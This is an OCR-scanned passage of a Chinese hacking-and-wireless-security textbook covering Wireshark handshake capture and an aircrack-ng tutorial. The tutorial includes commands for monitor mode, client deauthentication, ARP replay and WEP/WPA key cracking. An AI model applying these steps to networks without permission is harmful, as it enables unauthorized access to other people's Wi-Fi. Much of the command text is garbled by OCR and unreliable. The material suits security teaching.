

Graph Name Display Filter Color Sole rAds 
组 加 Lin: 


对 数 刻 度 


复位 


复制 | XClose | DisaveAs. 


[sep[ 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “流量 图 ”菜单 命令 ， 


打开 下 图 所 


示 的 “流量 图 ”对 话 框 ， 其 中 包括 通信 时 间 、 通 信 地 址 、 端 口 以 及 通信 过 程 中 的 协议 功 


能 ， 非 常 清晰 明了 。 


2018-10-10 214324203964244 


201-10-10 2b4326 355197507 


Baa 0 
不光 


Bm 


na oacaodlo 


MA: Tcppom ~ 


地 地 任何- 
Le 


[rg as 和 


step 国 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “TCP 流 型 图 ”菜单 命令 ， 打 开 下 


图 所 示 的 对 话 框 。 在 其 中 可 以 根据 实际 需要 设置 相应 的 显示 ， 还 可 以 切换 数据 包 的 方向 。 


Segment Length (B) 
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2 
1 
1 
0 
0 
0 
-1 
1 
2 


时 间 / 序 列 (tcptrace) | 
面 口 RT | 


理 吐 量 对 于 192.168.0.110:44786 * 80.239.178.19:80 (MA) 


香 吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


tcp.pcapng 
24 > 
1s § 
时 
O08 

0 三 
-08 号 
-16 区 
24 

4S 3 45 5 15 9 
Time(s) 
beesr 3 有 人 0bytes 

MA Window(s) 1000000 了 流 |1 | 切换 方向 | 

虽 标 | 时 间 / 序 到 (Stevens) | 六 段 长 度 V 知 久 量 “实际 香 叶 量 复位 


¥Close ]| cisaveAs- 
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7.4 实战 演练 
实战 演练 1 一 一 篆 选 出 无 线 通信 中 的 握手 信 


筛选 无 线 通信 中 握手 信息 可 以 通过 以 下 几 个 步骤 进行 
将 网 卡 置 入 monitor 模 式 。 使 用 iw dev wlan0 interface add wlan0mon type monitor 命 令 
将 网 卡 置 入 monitor 模 式 ， 如 下 图 所 示 。 


root@kali:-# iw dev wLan6 interface add wlanemon type monitor 
root@kali:-# iwconfig 
wlangmon IEEE 892.11 Mode:Monitor Tx-Power=29 dBm 
Retry short long limit:2 RTS thr:off Fragment thr:off 
Power Management:off 


wlang IEEE 802.11 ESSID:off/any 
Mode:Managed Access Point: Not-Associated Tx-Power=29 dBm 
Retry short long limit:2 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:off 


lo no wireless extensions. 
ethg no wireless extensions 

使 用 ifconfig wlan0mon up 命令 ， 将 新 创建 的 无 线 网 卡 启 动 ， 如 下 图 所 示 。 
A 


root@kali: -# ifconfig 
etho: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1569 
inet6 fe80::20c:29ff:fe7f:3912 prefixlen 64 scopeid 6x20<link> 
ether 69:9c:29:7f:39:f2 txqueuelen 1060 (Ethernet) 
RX packets 14627 bytes 29948396 (19.1 MiB) 
RX errors 9 dropped 6 overruns © frame 9 
TX packets 4945 bytes 311322 (394.9 KiB) 
TX errors 9 dropped 8 overruns 9 carrier 9 collisions 9 


Lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.0.0.1 netnask 255.0.0.0 
inet6 ::1 prefixlen 128 scopeid 9xl0<host> 
loop txqueuelen 1999 (Local Loopback) 
RX packets 164 bytes 8356 (8.1 KiB) 
RX errors 9 dropped @ overruns 9 frame 9 
TX packets 164 bytes 8356 (8.1 KiB) 
TX errors 9 dropped 6 overruns 9 carrier 9 cottlslons 8 


wlanonon: flags=4153<UP,BROADCAST, RUNNING, MULTICAST> ntu 1590 
unspec E8-4E-66-28-AE-46-99-99-69-99-99-99-99-66-99-99 txqueuelen 1999 (UNSPEC) 
RX packets 102 bytes 15139 [14.7 KiB 
RX errors 9 dropped @ overruns 9 frame 9 
TX packets 0 bytes 9 (6.6 B) 
TX errors 9 dropped 6 overruns 9 carrier 9 collisions 9 


由 启动 Wireshark 抓 包工 具 ， 选 择 wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 


| Capture 


| -using this filter: aptur 


ethO 


加 二 
Loopback: lo A 
nflog 


L_Learn 


step 园 在 抓 取 到 的 数据 包 中 筛选 并 标记 出 握手 信息 数据 包 ， 如 下 图 所 示 。 


Destination Protocol Length Info 
VivaMobi_aB:f3: 23:b2: a faa) (RA 802 16 Request -to-send, Flags= 
23:b 3) (RA 16 Reque: 


iangdon 4 5) (RA 892.31 19 Ackn 
VivoMobi_a8 18 Acknowledgenent, 
VivaMobi_aB:f3: : 16 Request -to-send, 
VivoMobi_a8:f3; , 16 Request -to-send, 
VivoMobi 16 Request -to-send, 


voP a3 ET 


VivoMoDl a8:T3:a3 (8:2 BE 16 Request -to-send, 
VivoMobi_aB : 15 Request -to-send, 
VivoMobi_an: 
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step 园 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 导 出 
本 二 机 二 二 和 息 数据 包 ， 如 下 图 所 示 。 


Wireshark . Export Specified Packets 


-大 小 
MM Public 

文件 名 称 (N) : |'esll 

Exportas: Wiresharkftcpdump/-.- paap 

Packet Range Cempress with gzip 


Gaptured © Displayed 


Al packets 8975 
Selected packets only 

» Marked packets only 6 
Psttetetmarked 3 
Range o 


实战 演练 2 一 一 快速 定位 身份 验证 信息 数据 包 


通过 Wireshark 抓 取 到 整个 握手 过 程 数据 包 后 ， 用 户 可 以 通过 以 下 步骤 来 快速 定位 ， 精 
确定 位 到 身份 验证 数据 包 。 
通过 Wireshark 打 开 抓 取 到 的 握手 信息 数据 包 ， 如 下 图 所 示 。 


Open 


step 回 在 第 选 条 件 文本 框 中 输入 eapol 筛 选 条 件 ， 如 下 图 所 示 。 


No. Time Source Destnation, Protocol Lengn Wo 


， 108 Bats), 237 bytos captured (4806 bits) 
, 鸣 。 Ee i CS Dota, Fo 


区 图 单 二 右 全 的 | 按钮 ， 即 可 展开 身份 验证 信息 ， 如 下 图 所 示 。 


» IEEE 892.11 QOS Dato, Flags: 
,Logical-Link Control” 
"Dox Mthenticarion 
82.1X-2994 {2) 
加 


ion; 9x13ca 


2 
6cbeg9911f4c4c2a4453356ddd9973f3cg6a73cbae5adf1. .. 
99900000000C00GG666663699998 


Te S10d24658T ban31980rhfS7ecdn 
MPA Key Dota Length: 104 
WPA Key Data: a454604453287eeg86c785aa3919c150aBe67267a84749976 


7.5 小 试 身 手 


练习 1: 使 用 Wireshark 进 行 抓 包 。 
练习 2: 使 用 筛选 器 筛选 出 需要 的 数据 包 。 
练习 3: 如 何 对 数据 包 进 行 标 记 并 导出 这 些 标记 的 数据 包 。 


1 过 


第 8 音 ”无 线路 由 硕 的 密码 安 


全 策略 


无 线路 由 器 的 加 密 方式 包括 WEP、WPA 与 WPS 三 种 ， 针 对 不 同 的 方式 ， 玻 解密 码 的 工 


具 以 及 安全 维护 方式 都 不 同 。 


8.1 破解 密码 前 的 准备 工作 


在 开始 破解 密码 之 前 需要 有 一 些 准备 
工作 ， 这 里 需要 用 户 购 买 一 个 无 线 网 卡 ， 
该 网 卡 需 要 适合 kali 虚 拟 机 ， 一 般 atheros 芯 
片 的 无 线 网 卡 可 以 安装 在 kali 虚 拟 机 中 ， 不 
过 ， 为 确保 购买 的 网 卡 正 确 ， 购 买 前 请 认 
真 询 问 是 否 支持 kali 虚 拟 机 。 


8.1.1 查看 网 卡 信息 


无 线 网 卡 购买 后 ， 下 面 就 可 以 查看 网 
卡 的 信息 了 ， 包 括 网 卡 模 式 、 网 卡 信息 、 
网 卡 映 射 信息 等 。 具 体操 作 步 又 如 下 : 
查看 网 卡 模式 。 使 用 iw list 命 令 查 看 
网 卡 的 信息 。 下 图 为 执行 效果 。 这 里 显示 
出 来 的 模式 是 该 网 卡 所 支持 的 所 有 模式 。 

Supported interface modes: 
managed 
AP 
AP/VLAN 


monitor 
mesh point 


ep 在 Kali be 系统 命令 界面 中 输入 
ifconfig -a 命令 过 这 个 命令 可 以 查看 本 
机 所 有 网 上 信息， ae 
机 中 没有 无 线 网 卡 ， 如 下 图 所 示 。 


Pe 


enet re 
于 cs RING TICAST> mtu 1500 

192 168.157,131 

26c:29ff: 


192 .168.157.255 
x29<Link> 


ho: flag: 
in 


工具 栏 中 的 “虚拟 机 ”菜单 项 ， 在 弹出 
的 菜单 列表 中 选择 “可 移动 设备 ”菜单 
命令 ， 再 从 “可 移动 设备 ”菜单 列表 中 选 
择 相应 的 无 线 网 卡 并 进行 连接 ， 如 下 图 
所 示 。 


EN = em 让- 本 和 
站 昌 


[ep 图 此 时 会 弹出 一 个 提示 框 ， 询 问 是 否 连 
yg 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
所 示 。 


kali-linux-2018.3-vm-amd64 - VMware Workstation x| 


移 除 。 对 于 某 些 设备 ， 主 机 可 能 会 显示 消息 现 
在 可 以 安全 地 移 除 设备 。 


口 不 再 显示 此 消息 (S) 


@ 某 个 USB 设备 将 要 从 主机 拨 出 并 连接 到 该 虚拟 机 。 该 设备 将 先 
停止 以 实现 安全 


Cue ] ww 


step 图 再 次 运行 ifconfig -a 命令 。 这 时 会 多 出 
一 个 wlan 开 头 的 网 卡 ， 这 就 是 无 线 网 卡 ， 
ld 


5 
Jp， notocnsT, UNNING, MULTICAST> tu 1509 
255,255.255-8 bronde 


st 192.168 157.255 


i 使 用 es 5 来 只 显示 无 


step 图 将 网 卡 映射 进 虚 拟 机 ， 选 择 vmware 


卡 信息 ， 下 图 为 执行 效果 。 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


[raatBRaUIE-S iweontig 
to no wireless extensions. 


ee p73 
:2.437 6Hz Access Point: 86:83:CD:33:68:73 


Retry short, Yong Unit:2 RTS thrzoff Fragnent thr:off 
Encryption key: 
PangcS eof 
Link Quality=70/76 signal tevet=-17 dem 
Rx invatid nwid: Rx invalid crypt:9 Rx invalid frag:9 
Tx excessive retries:25 Invatid misc:0 Missed beacon:0 
letha no wireless extensions. 


加 8.1.2 ”配置 网 卡 进 入 混杂 模式 


step 回 使 用 iw dev wlan0 interface add 


wlan0mon type monitor 命 令 可 以 将 一 个 网 卡 
植 入 混杂 模式 ， 如 下 图 所 示 。 其 中 dev 后 面 
跟 的 是 具体 无 线 网 卡 的 名 称 ， 新 增加 的 网 
卡 名 称 必须 是 wlan+ 一 个 数字 +mon 形 式 。 
[rootBKaUi: # jw dev WUang interTface add WUangnmon type monitor 

设置 完成 后 ， 运 行 iwconfig 命 令 ， 查 
看 无 线 网 卡 信息 ， 如 下 图 所 示 。 其 中 会 多 
出 一 个 wlan0mon 无 线 网 卡 ， 并 且 模 式 是 
monitor (混杂 模式 ) 。 


FaatBNNUITW IW dev YUNG InterTace add WUanonon Type Wonitor 
roorghati: # iwconti 

to no wireless extensions. 

anonon IEEE B02.11 Made:Monitor Tx-Power=20 dan 
Retry short tong linit:2 RTS thrioff Fragnent thr:oft 
Power Management:off 


Wang IEEE B02.11 ESSID:*TPGuest 6073" 
Hodethanagad Frequencys2,437 Ghz Mccrzs Points, 0:AtcDs60:7s 
Blt Rate=l Mb/s Tx-Power=20 dBm 
Nery shart hong Vnitr RS hrioff Fragnent thrieff 
Encryption key:ott 
Power Management.:off 
LInk guattty=18// Signal Level=-1/ dum 
Rx invalid pwad:8 Rx invalid crypt:9 Rx invalid frag:9 
Tx excessive retries:25 Invalid nisc:8 Missed beacon:® 


etho no wireless extensions 


[step 图 执行 ifconfig wlan0mon up 命令 ， 将 
新 加 入 的 无 线 网 卡 启 用 ， 再 次 运行 ifconfig 
命令 ， 可 以 看 到 网 卡 列表 中 已 经 启用 的 
wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 此 时 使 
用 Wireshark 抓 包 软 件 便 可 以 抓 取 802.11 无 线 
通信 协议 数据 包 2 


anonon: flags=4153<UP, BRDADCAST, RUNNING, MULTICAST> mt 150 
nsped E4200"20" AE-40.49.3A00. 00 68- 08000-0968-08 txaueuelen 1088 
{UNSpEC) 
RX packets 2308 bytes 366342 (351.8 KiB) 
Rx errors a dropped 2308 overruns 0 frame 6 
Tx packets 0 bytes 日 (9.9 8) 
TX errors 8 dropped 8 overruns © carrier 9 collisions 日 


8.2 ”密码 破解 工具 一 一 aircrack 


aircrack 是 目前 WEP/WPA/WPA2 破 解 领 
域 中 最 热门 的 工具 ，aircrack-ng 套 件 包含 的 
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工具 能 够 捕捉 数据 包 和 握手 包 ， 生 成 通信 数 
据 ， 或 进行 暴力 破解 攻击 以 及 字典 攻击 ， 
该 套件 包含 airmon-ng、aircrack-ng、aire- 
play-ng、airodump-ng、airbase-ng 等 工具 。 


8.2.1 airmon-ng 工 具 


airmon-ng 工 具 属于 aircrack-ng 套 件 中 的 
一 种 ，airmon-ng 用 来 实现 无 线 接口 在 man- 
aged 和 monitor 模 式 之 间 的 转换 及 清除 干扰 
进程 。 

pe ile 
运行 airmon-ng 命 令 ， 即 可 查看 无 线 网 
Se 片 信息 ， 如 下 图 所 示 。 


oA TT ToT 


PHY lntertace Driver Chipset 


phyl 。 wuang rr2seeusb Ralink Technotogy，corp。RT2878/RT3978 


运行 airmon-ng --h 命 令 ， 即 可 查看 
arimon-ng 工 具 的 命令 格式 ， 如 下 图 所 示 。 


rootekati:-# airnon-ng --h 


usage: airmon-ng <start|stop|check> <tnterface> [channel or frequency， 


[step 图 运行 airmon-ng check 命 令 ， 即 可 查看 
有 哪些 进程 会 影响 到 aircrack- ng 套件 的 工 
作 ， 如 下 图 所 示 。 


FOTORALILT -# SITFWGF-T9 Check 


IFound 4 processes that could cause trouble 

Kill then using 'airmen-ng check kill' before putting 

the card in monitor node, they will interfere by changing channels 
land sonetines putting the interface back in managed mode 


PID Nane 
484 NetworkManager 
569 wpa_supplicant 

2736 dhclient 

4492 dhclient 


侈 提示 : 查询 完成 后 ， 用 户 可 以 通过 kill 
命令 加 进程 PID 号 终止 相关 进程 ， 但 是 air- 
mon-ng 工 具 提 供 了 一 个 简便 的 方法 ， 就 是 
运行 airmon-ng check kill 命 令 ， 就 可 以 将 干 
扰 进 程 直接 中 断 运行 。 另 外 ， 为 了 保证 抓 
取 数 据 包 能 顺利 执行 ， 建 议 用 户 执 行 sService 
network-manager stop 命 令 ， 停 止 网 络 管 
理 器 的 运行 ， 因 为 这 个 服务 会 影响 抓 取 数 
据 包 。 


step 贺 当 配 置 完成 后 ， 运 行 airmon-ng start 


wlan0 命 令 ， 将 无 线 网 卡 植 入 混杂 模式 ， 如 
下 图 所 示 。 


[oat rn ng start wong 


[Found 2 processes that could cause trouble 
[iLL them using 'airmon-ng check kill’ before putting 

lthe card in nonitor node, they will interfere by changing channels 
land sometimes putting the interface back in wanaged node 


PID Nane 
569 wpa supplicant 
2736 dhciient 


phy Interface Driver chipser 


pnys vlan rtzaaeush Ralink Technotogy，corp，RT2878/RT3878 
《mac8e211 nonitor mode vif enabted for [phys]wlane on [physJvanemon) 


《maca9211 station mode vif disabled for [phy#]wiang) 


第 8 章 无 线路 由 器 的 密码 安全 策略 二 和 


tH 1 I Elapsed: 6 $ 10 2019-19-13 07:11 


ssmp PR RO Beacons 。 sata, #/s CH MB ENC CIPHER AUTH ESSID 
csFAs68:01:2F:00 -1 © a 23 4 WEP NEP <length: 0> 
assm sTATION PR Rate Lost Frames probe 
CsFA:68:01:2F:08 DC:6D:CD:66:FE:CB -16 8-6e 2 0 


侈 提示 : 抓 取 数 据 分 为 两 块 显示 ， 第 一 个 
BSSID 代 表 AP 端 的 数据 ， 第 二 个 BSSID 代 
表 STA 端 的 数据 ， 当 指定 信道 抓 取 数 据 后 会 
多 出 一 个 RXQ 字 段 。 


step 图 运行 ifconfig 命 令 ， 可 以 查看 网 卡 信 
息 ， 下 图 为 执行 效果 。 


ondnon TUags=4153<UP, 6ROADCAST, RUNNING, MUCTICAST>— AL 1566 
nspeC EB-4E-66-28-AE-45-39-3A-60:09-88-66-00-69-68-60 txqueuelen 1099 (UNSPEC) 
RX pachets 8364 bytes 419016 (409.1 KiB) 


RX errors 0 dropped B364 overruns 0 frane 9 
Tx packets 9 bytes 9 (9.0 B) 


TX errors 9 dropped 9 overruns 9 carrier © collisions 9 


侈 提示 : 通过 airmon-ng 工 具 可 以 快速 配置 
网 卡 进入 混杂 模式 并 启动 新 加 入 的 无 线 网 
卡 ， 这 个 原理 同 手动 设置 是 一 样 的 。 


8.2.2 airodump-ng 工 具 


airodump-ng 工 具 是 aircrack-ng 套 件 中 用 
于 抓 取 数 据 包 的 工具 。 使 用 airodump-ng 工 
有 具 的 操作 步骤 如 下 : 
抓 取 网 络 数 据 包 。 运 行 airodump-ng 
wlan0mon 命 令 ， 进 入 轮 询 模式 ， 并 抓 取 网 
络 数据 包 。 下 图 为 抓 取 的 信息 。 其 中 ，CH 
代表 信道 ，airodump-ng 会 从 网 卡 最 小 信道 
到 最 大 信道 循环 抓 取 数 据 包 ， 每 间隔 1s 更 换 
一 个 信道 。 


[or 2 IU Elapsed: 0 s J 2010-10-13 95:59 


551D Pm Beacons soata, #/s CH MB ENC CIPHER AUTH ESSID 
00:2F:09:C3:57:9D -58 
TO:AF:6A:09: LE:9D -59 
38:21:87:86:20:AB 44 
84:15+13:8C:10:A2 -55 


0 9 13 139 WpA CCMp Psk ChinaNet-DysG 
日 13 130 WPAZ CCMP PSK TP794613852 

a 7 65 WPAZ CCMP PSK nidea ac 0362 

a 1 -1 op <length:” 6> 


4:55:A3:70:37:92 -4 3 9 1 54e. OPN MCC 
BssID STATION PuR Rate Lost Franes Probe 
84:15:13:8C:10:A2 FO:79:E8:41:80:07 -1 le @ 2 
E468:A3:7D:37:92 1C:DD:EA:93:97:Fa -1 le-0 8 3 


[step 图 抓 取 指 定数 据 。 运 行 airodump-ng 
-Cc 1 --bssid 1C:FA:68:01:2F:08 -w wep002 
wlan0mon 命 令 ， 该 命令 只 抓 取 信道 为 1、 
BSSID 的 MAC 地 址 为 1C:FA:68:01:2F:08 的 
流量 包 ， 并 将 抓 取 的 数据 包 保 存 为 wep002 
的 文件 。 下 图 为 运行 结果 。 


捕获 认证 过 程 。 当 ariodump-ng 工 
具 捕 获 到 STA 与 AP 的 认证 过 程 ， 会 多 出 
keystream 字 段 ， 该 字段 也 被 称 为 密 钥 流 ， 
便 有 可 能 计算 出 无 线路 由 的 认证 密码 ， 如 
下 图 所 示 。 


UIT Elapsed: 15918199 07138 JT 140 bytes Keystreonm CTRA16619112F168 


BssID Pwr RxO Beacons #0ata, #/s CH Me ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:68 -2 31 121 7 5 1 54e, WEP WEP SKA Test-001 
Bs51D STATION Pm Rate Lost franes Probe 


1c:FAi6B:91:2F:68 DC:6D:CD:66:FEICB -14 9 -be 6 189 Test-091 


8.2.3 aireplay-ng 工 具 
[op 


aireplay-ng 是 一 个 注入 帧 的 工具 ， 主 并 
要 作用 是 产生 数据 流量 。 这 些 数据 流量 会 加 
被 用 于 aircrack-ng， 从 而 破解 WEP 和 WPA/ 
WPA2 秘 钥 。 aireplay-ng 里 包含 了 很 多 种 四 
不 同 的 发 包 方式 ， 用 于 获取 WPA 握 手包 ， 中 
aireplay-ng 当 前 支持 的 发 包 种 类 有 9 种 ， 如 
下 图 所 示 。 


FEEScK madss (rumbers can SEITU be 0560JT 


deauth count : deauthenticate 1 or all stations (-@ 

fakeauth delay : fake authentication with AP (-1) 
~-interactive interactive frane selection (-2) 
--arpreptay standard ARP-request replay (-3) 
--chopchop decrypt/chopchop WEP packet (-4) 
--fragment generates valid keystream  (-5) 
--caffe-latte query a client for new IVs (-6) 
--cfrag fragnents against a client (-7) 
--migmode attacks WPA migration mode (-8) 
--test # tests injection and quality (-9) 

help ;Displays this Usage screen _ 


下 面 详 细 介 绍 发 包 种 类 中 各 个 参数 的 
含义 。 
--deauth count: 解除 认证 。 
--fakeauth delay: 伪造 认证 。 
--interactive: 交互 式 注 入 。 
--arpreplay: ARP 请 求 包 重 放 。 
--chopchop: 端点 发 包 。 
--fragment: 碎片 交错 。 
--caffe-latte: 查询 客户 端 以 获取 新 
的 IVs。 
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e --cfrag: 面向 客户 的 碎片 。 


e --migmode: WPA 迁 移 模式 。 
e --test: 测试 网 卡 可 以 发 送 哪 种 类 型 
的 数据 包 。 


除了 解除 认证 〈-0) 和 伪造 认证 (-1) 
以 外 ， 其 他 所 有 发 包 都 可 以 使 用 下 面 的 过 


滤 选 项 来 限制 数据 包 的 来 源 。-b 是 最 常用 的 
一 个 过 滤 选 项 ， 它 的 作用 是 指定 一 个 特定 


的 接 入 点 。 下 图 为 帮助 信息 。 


ICEEF optionss 


-b bssid : MAC address，Access Point 
-d dmac : MAC address，Destination 
S Smac : MAC address, Source 
mlen  : minimum packet length 
nlen :maximum packet Length 
type : frame control, type field 
v subt  : frame control, subtype field 
t tods : frame control, To DS bit 
f fromds : frame control, From DS bit 
iswep : frame control, WEP bit 
: disable Ap detection 
主要 参数 介绍 如 下 ; 
@ -bbssid : 接 入 点 的 MAC 地 址 。 
e -ddmac: 目的 MAC 地 址 。 
e -ssmac: 源 MAC 地 址 。 
e -mlen: 数据 包 最 小 长 度 。 
e -nlen: 数据 包 最 大 长 度 。 
e -utype: 含有 关键 词 的 控制 帧 。 
e@ -vsubt: 含有 表单 数据 的 控制 帧 。 
e -ttods: 到 目的 地 址 的 控制 帧 。 
e -f fromds: 从 目的 地 址 出 发 的 控 
制 帧 。 


e -wiswep: 含有 WEP 数 据 的 控制 帧 。 

当 需 要 重 放 〈 注 入 ) 数据 包 时 ， 会 用 
到 重 放 选 项 中 的 参数 ， 但 是 并 不 是 每 一 种 
发 包 都 能 使 用 所 有 的 选项 。 下 图 为 重 放 选 
项 帮助 信息 。 


REPUay options: 


Pps ee A pa hess Pe Re er 
p fctrl : setf ntrol word (hex) 
a 人 : se nt MAC address 
-C EE MAC address 
h MAC address 
2 value buffer size (defautt: 8) 


Fakeauth attack options 


-e essid : Se ee Des 

a npckts : s burst (9-auto, default: 1) 
qsec Sn Dern lives 

-9 : send ti sts 

-yprga : Keystr nh or snaredl Rey auth 

-Tn : exit after retry fake auth request n tine 


Arp Replay attack options: 


i : inject FromDs packets 
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主要 参数 介绍 如 下 : 
e -x nbpps: 设置 每 秒 发 送 数 据 包 的 
数目 。 
e -p fctrl: 设置 控制 帧 中 包含 的 信息 
(十 六 进 制 ) 。 
-a bssid: 设置 接 入 点 的 MAC 地 址 。 
-c dmac: 设置 目的 MAC 地 址 。 
-h smac: 设置 源 MAC 地 址 。 
-g value: 修改 缓冲 区 的 大 小 (默认 
值 : 8) 。 
-下 : 选择 第 一 次 匹配 的 数据 包 。 
e -e essid: 虚假 认证 中 ， 设 置 接 入 点 
名 称 。 
® -onpckts: 
数量 。 
e -qsec: 设置 持续 活动 时 间 。 
e -y prga: 包含 共享 秘 钥 的 关键 数 
据 流 。 
aireplay-ng 有 两 个 获取 数据 包 来 源 ， 第 
一 个 是 无 线 网 卡 的 实时 通信 流 ， 第 二 个 则 
是 pcap 文 件 。 大 部 分 商业 的 或 开源 的 流量 
捕获 与 分 析 工具 都 可 以 识别 标准 的 pcap 文 
件 。 从 pcap 文 件 读 取 数 据 是 Aireplay-ng 一 
个 经 常 被 忽视 的 功能 。 这 个 功能 可 以 从 捕 
提 的 其 他 会 话 中 读 取 数据 包 。 注 意 ， 有 很 
多 种 发 包 会 在 发 包 时 生成 pcap 文 件 以 便 重 
复 使 用 。 
当 抓 取 指定 AP 与 数据 时 ， 如 果 想 要 抓 
取 密 钥 必须 在 AP 与 STA 开 始 建立 关联 时 开 
始 ， 此 时 如 果 已 经 有 合法 关联 的 STA， 为 
了 避免 一 直 等 待 它们 重新 关联 ， 可 以 使 用 
airepaly-ng -0 < 发 包 次 数 > -a <AP 的 MAC 地 
址 > -c <STA 的 MAC 地 址 > wlan0mon 命 令 ， 
运行 效果 如 下 图 所 示 ， 将 已 经 关联 的 STA 与 
AP 断 开 连接 ， 正 常情 况 下 STA 与 AP 会 自动 
重 连 。 


每 次 发 包 时 包含 数据 包 的 


其 中 -0 后 面 的 参数 为 发 包 次 数 ， 如 果 指 


定 为 0 表示 不 停 地 发 送 。-c 后 面 的 参数 为 需 
要 解除 关联 的 客户 端 MAC 地 址 ， 如 果 不 指 
定 将 会 以 广播 的 形式 发 送 ， 解 除 所 有 与 AP 
关联 的 客户 端 。 

使 用 抓 取 到 的 密 钥 流 进行 关联 ， 可 以 
使 用 aireplay-ng -1 < 间隔 时 间 > -e <ESSID> 
-y < 密 钥 流 文件 > -a <AP-MAC 地 址 > -h < 需 
要 关联 的 客户 端 MAC 地 址 > 命令 ， 执 行 后 如 
下 图 所 示 。 


aT 


oat 


, | 
当 无 线路 由 使 用 WEP 进 行 加 密 时 ， 
破解 密码 需要 抓 取 大 量 的 IV 值 ， 可 以 采 
用 抓 取 一 段 合 法 ARP 数 据 包 ， 然 后 使 用 
areplay-ng 工 具 发 送 大 量 的 ARP 数 据 包 ， 这 
种 方式 叫 重 放 ， 也 就 是 合理 数据 重复 发 
送 使 得 AP 大 量 回应 ARP， 在 回应 ARP 数 
据 包 中 包含 IV。 这 种 方式 前 提 是 必须 先 
建立 关联 ， 通 过 重 放 便 可 以 收集 IV 值 。 当 
收集 到 足够 数量 的 [IV 时 ， 无 论 多 复杂 的 密 
码 都 可 以 被 计算 出 来 。 执 行 aireplay-ng -3 
-b <AP-MAC 地 址 > -h < 本 机 MAC 地 址 > 
wlan0mon 命 令 便 可 以 开始 重 放 ， 如 下 图 
所 示 。 


atEKNTITY -人 
I 


8.2.4 aircrack-ng 工 具 


aircrack-ng 是 一 个 802.11 的 WEP 和 WPA/ 
WPA2-PSK 破 解 程序 工具 。 一 旦 使 用 airo- 
dump-ng 抓 取 足 够 多 的 加 密 数 据 包 以 后 ， 
aircrack-ng 可 以 用 来 破解 WEP 密 钥 。 

aircrack-ng 破 解 WEP 密 钥 有 3 种 方法 ， 
分 别 是 : PTW 方 法 、FMS/KoreK 方 法 和 词 
典 比 对 方法 。 

(1) PTW (Pyshkin, Tews, Wein- 
mann) 方法 。 是 破解 WEP 密 钥 的 默认 方 
式 ， 由 两 个 阶段 组 成 。 第 一 个 阶段 是 air 
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crack-ng 只 使 用 ARP 包 ， 如 果 找 不 到 密 钥 ， 
再 尝试 捕捉 到 的 其 他 数据 包 。 要 知道 ， 并 
不 是 所 有 的 数据 包 都 可 以 用 来 进行 PTW 破 
解 。 目 前 PTW 方法 只 能 破解 40 位 和 104 
位 的 WEP 密 钥 。PTW 方法 的 优点 是 ， 只 
须 很 少 的 数据 包 就 可 以 破解 WEP 密 钥 。 

(2) FMS/KoreK 方法 。 包 含 了 很 多 统 
计 攻 击 方式 ， 并 且 结合 了 暴力 破解 方式 。 

(3) 词典 比 对 方法 。 而 对 于 WPA/ 
WPA2-PSK 共享 密 钥 ， 只 有 词典 比 对 这 一 
种 方法 。SEE2 则 可 以 极 大 地 加 速 这 个 漫长 
的 比 对 过 程 。 破 解 WPA/WPA2-PSK 时 ， 需 
要 一 个 四 次 握手 包 作为 输入 。 对 于 WPA 来 
说 ， 需 要 4 个 包 才能 完成 一 次 完整 的 握手 ， 
然而 aircrack-ng 只 要 其 中 的 两 个 就 能 够 开 
始 工作 了 。 

使 用 aircrack-ng 命 令 查看 其 帮助 信息 。 
下 图 为 执行 效果 。 
AIrcrack-ng 1.4 - (C) 2666-26TI8 Thomas drOtreppe 
https://www.aircrack-ng.org 
usage: aircrack-ng [options] <input file(s)> 


-a <amode> : force attack mode (1/WEP, 2/WPA-PSK) 


-e <essid> : target selection: network identifien 
-b <bssid> : target selection: access point's MAC 
-p <nbcpu> : # of CPU to use (default: all CpUs) 
-9 : enable quiet mode (no status output) 
-C <macs> : merge the given APS to a virtual onel 
-L <file> : write key to file. Overwrites file. 


主要 参数 介绍 如 下 : 

e -a <amode>: 强力 攻击 模式 (1/ 
WEP, 2/WPA-PSK) 。 

e -e <essid>: 目标 选择 : 网 络 标识 
符 。 

® -b <bssid>: 
MAC 。 

e -p <nbcpu>: 使 用 的 CPU 默认 : 所 
有 CPU》 。 

。-q: 启用 静音 模式 (无 状态 输 
出 ) 。 

e -C <macs>: 将 给 定 的 AP 合并 到 一 
个 虚拟 的 AP。 

e -1 <file>: 写 入 文件 密 钥 。 


目标 选择 : 接 入 点 的 
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下 图 为 WEP 设 置 相关 的 选项 。 


Btatic WEP cracking options: 


-c : search alpha-numeric characters only 
-t : search binary coded decimal chr only 
-h : search the numeric key for Fritz!B0X 
-d <mask> se masking of the key (Al:XX:CF:YY) 


-m <maddr> : MAC address to filter usable packets 
-n <nbits> : WEP key Length : 64/128/152/256/512| 
-i <index> : WEP key index (1 to 4), default: any 
-f <fudge> : bruteforce fudge factor, default: 2 
-k <korek> : disable one attack method (1 to 17) 


-x or -xg : disable bruteforce for Last keybytes| 
-x1 : last keybyte bruteforcing (default) 
-x2 : enable last 2 keybytes bruteforcing 
-X : disable bruteforce multithreading 
-y : experimental single bruteforce mode 
-K : Use only old Korek attacks (pre-PTW) 
-s : show the key in ASCII while cracking 
-M <num>  : specify maximum number of IVs to use 
-D : WEP decloak, skips broken keystreams 
-P <num>  : PTW debug: 1: disable Klein, 2: PTW 
-1 : run only 1 try to crack key with PTW 
-V : run in visual inspection mode 

主要 参数 介绍 如 下 : 

e -c: 只 搜索 字母 数字 字符 。 

e -t: 只 搜索 二 进 制 编码 的 十 进 制 


字符 。 


e -h: 搜索 弗 里 茨 的 数字 键 。 
e -d <mask>: 使 用 密 钥 过 滤 〈Al:XX: 


CRYTYY 2 

-m <maddr>: MAC 地 址 用 以 过 滤 掉 
无 用 数据 包 。 

-n<nbits>: WEP 密 钥 长 度 : 
64/128/152/256/512 

- i <index>: WEP 密 钥 索 引 (1 一 
4) ， 默 认 值 : 任何 。 

